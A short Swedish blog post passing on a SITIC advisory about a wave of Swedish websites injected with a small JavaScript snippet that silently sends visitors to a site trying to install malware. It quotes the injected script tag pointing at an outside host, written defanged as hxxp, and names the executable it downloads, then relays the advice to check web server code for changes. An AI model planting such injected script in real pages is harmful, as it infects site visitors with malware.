De senaste veckorna har ett stort antal svenska hemsidor blivit infekterade med skadlig kod. Ett litet java-script har lagt till i källkoden på hemsidorna som i tysthet skickar besökaren vidare till en hemsida där skadlig kod försöker installeras på besökarens dator. Allt sker i bakgrunden så användaren ser inte att detta sker.

Detta skriver SITIC (Sveriges IT-incidentcentrum) på sin hemsida.

Koden som läggs till på hemsidan är: <script src=hxxp://www.nihaorr1.com/1.js>.

Vid lyckad exploatering laddas hxxp://www.nihaorr1.com/test.exe ned och exekveras.

Sitic rekommenderar att man kontinuerligt verifierar att källkoden på ens webbserver inte modifierats.

Genom en sökning på Google kan man få svar på hemsidor som är eller har varit infekterade.

Läs även andra bloggares åsikter om internet, säkerhet, datavirus.